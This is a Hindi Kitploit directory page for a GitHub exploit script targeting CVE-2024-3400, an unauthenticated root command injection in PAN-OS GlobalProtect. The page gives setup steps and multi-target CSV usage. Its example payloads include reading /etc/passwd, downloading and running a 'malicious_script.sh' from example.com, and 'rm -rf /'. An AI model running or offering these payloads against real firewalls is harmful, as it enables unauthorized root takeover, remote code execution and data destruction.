Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-3400 — CVE-2024-3400 के लिए एक्सप्लॉइट स्क्रिप्ट, जो PAN-OS GlobalProtect में एक कमांड इंजेक्शन है, जो रूट विशेषाधिकारों के साथ बिना प्रमाणीकरण के रिमोट कोड निष्पादन की अनुमति देता है। एकल और CSV-आधारित मल्टी-टारगेट एक्सप्लॉइटेशन का समर्थन करता है। | Kitploit
उपकरण/GitHubGitHub/yuvvi01/cve-2024-3400
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंग
GitHubyuvvi01/cve-2024-3400

CVE-2024-3400

CVE-2024-3400 के लिए एक्सप्लॉइट स्क्रिप्ट, जो PAN-OS GlobalProtect में एक कमांड इंजेक्शन है, जो रूट विशेषाधिकारों के साथ बिना प्रमाणीकरण के रिमोट कोड निष्पादन की अनुमति देता है। एकल और CSV-आधारित मल्टी-टारगेट एक्सप्लॉइटेशन का समर्थन करता है।

रिपॉजिटरी देखें
11512 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

PAN-OS फ़ायरवॉल एक्सप्लॉइट स्क्रिप्ट

यह स्क्रिप्ट PAN-OS फ़ायरवॉल में कमजोरियों के शोषण को प्रदर्शित करने के लिए डिज़ाइन की गई है। यह फ़ायरवॉल के API एंडपॉइंट पर एक विशेष रूप से तैयार किया गया पेलोड भेजता है ताकि मनमाने कमांड निष्पादित किए जा सकें। यह एक्सप्लॉइट विशेष रूप से CVE-2024-3400 को लक्षित करता है, जो Palo Alto Networks PAN-OS सॉफ़्टवेयर के GlobalProtect सुविधा में एक कमांड इंजेक्शन कमजोरी है, जो विशिष्ट PAN-OS संस्करणों के लिए है। विशेष फ़ीचर कॉन्फ़िगरेशन एक अप्रमाणित हमलावर को फ़ायरवॉल पर रूट विशेषाधिकारों के साथ मनमाना कोड निष्पादित करने में सक्षम बना सकता है।

नोट: कृपया सुनिश्चित करें कि आप इस स्क्रिप्ट का उपयोग केवल कानूनी और नैतिक उद्देश्यों के लिए करें, और केवल उन मशीनों पर करें जिन पर आपको परीक्षण करने की अनुमति है।

उपयोग

इस प्रोजेक्ट का उपयोग करने के लिए, इन चरणों का पालन करें:

  1. इस रिपॉजिटरी को क्लोन करें:
    root@kitploit:~
    git clone https://github.com/Yuvvi01/CVE-2024-3400
    
    
  2. रिपॉजिटरी में डायरेक्टरी बदलें:
    root@kitploit:~
    cd CVE-2024-3400
    
    
  3. आवश्यक मॉड्यूल इंस्टॉल करें:
    root@kitploit:~
    pip install -r requirements.txt
    
    
  4. पायथन स्क्रिप्ट चलाएं:
    root@kitploit:~
    python3 exploit.py
    

प्रॉम्प्ट्स का पालन करके कमजोर PAN-OS फ़ायरवॉल का IP पता और निष्पादित करने के लिए पेलोड दर्ज करें।

उदाहरण पेलोड

  1. डायरेक्टरी सामग्री सूचीबद्ध करें:
    root@kitploit:~
    ls -la
    
    
  2. किसी विशेष फ़ाइल की सामग्री प्रिंट करें:
    root@kitploit:~
    cat /etc/passwd
    
    
  3. सिस्टम में लॉग इन वर्तमान उपयोगकर्ता का उपयोगकर्ता नाम प्रिंट करें:
    root@kitploit:~
    whoami
    
    
  4. इंटरनेट से एक फ़ाइल डाउनलोड करें (wget या curl स्थापित होना आवश्यक):
    root@kitploit:~
    wget http://example.com/malicious_script.sh -O /tmp/malicious_script.sh && chmod +x /tmp/malicious_script.sh && /tmp/malicious_script.sh
    
    
  5. इसके साथ बहुत सावधान रहें:
    root@kitploit:~
    rm -rf /
    

सुरक्षित उपयोग के निर्देश

SSL प्रमाणपत्र जांच

स्क्रिप्ट PAN-OS फ़ायरवॉल सर्वर से SSL प्रमाणपत्र का फ़ाइल पथ पूछेगी। यदि कोई पथ नहीं दिया गया, तो स्क्रिप्ट स्वचालित रूप से SSL सत्यापन को गलत (false) पर सेट कर देगी, जिससे SSL प्रभावी रूप से अक्षम हो जाएगा।

CSV फ़ाइल निर्देश

यह स्क्रिप्ट आपको CSV फ़ाइल का उपयोग करके कमजोर PAN-OS फ़ायरवॉल के कई लक्ष्यों का शोषण करने की अनुमति देती है। नीचे CSV फ़ाइल को सही ढंग से फ़ॉर्मेट करने के निर्देश दिए गए हैं:

CSV फ़ाइल प्रारूप:

CSV फ़ाइल में तीन कॉलम होने चाहिए:

ipaddress: कमजोर PAN-OS फ़ायरवॉल का IP पता। payload: फ़ायरवॉल पर निष्पादित करने के लिए पेलोड। path/to/root_CA_certificate.pem: रूट CA प्रमाणपत्र का पथ (यदि प्रमाणपत्र सत्यापन अक्षम है तो खाली छोड़ें)।

  • उदाहरण CSV फ़ाइल:
    root@kitploit:~
    ipaddress,payload,path/to/root_CA_certificate.pem
    192.168.1.1,exploit_payload1,/path/to/certificate.pem
    192.168.1.2,exploit_payload2,
    

निर्देश:

निर्दिष्ट प्रारूप के साथ एक CSV फ़ाइल बनाएं। IP पते, पेलोड और रूट CA प्रमाणपत्र पथ (यदि लागू हो) भरें। सुनिश्चित करें कि रूट CA प्रमाणपत्रों के लिए मान्य पथ प्रदान करें या यदि प्रमाणपत्र सत्यापन अक्षम है तो फ़ील्ड खाली छोड़ दें। स्क्रिप्ट चलाएं और प्रॉम्प्ट होने पर CSV फ़ाइल का उपयोग करने का विकल्प चुनें।

संदर्भ

  • https://www.bleepingcomputer.com/news/security/palo-alto-networks-warns-of-pan-os-firewall-zero-day-used-in-attacks/
  • https://security.paloaltonetworks.com/CVE-2024-3400
टूल डाउनलोड करें